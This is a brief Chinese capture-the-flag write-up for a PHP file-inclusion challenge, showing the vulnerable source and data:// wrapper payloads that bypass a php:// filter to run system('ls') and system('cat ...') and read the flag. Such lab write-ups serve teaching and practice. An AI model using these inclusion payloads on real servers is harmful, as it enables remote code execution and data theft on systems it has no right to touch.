Web_php_include
进入题目源码直接出来了
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
看见了include函数并且发现过滤了php://,由此估计需要使用伪协议来读取flag内容,由于过滤掉了php,所以我们直接使用data://协议来执行指令
payload
?page=data://text/plain,<?system(%27ls%27);?>
然后又是cat查看一下就行
page=data://text/plain,<?system(%27cat%20fl4gisisish3r3.php%27);?>
但是页面没有回显任何内容,还以为我哪里做错了原来查看源码就发现了flag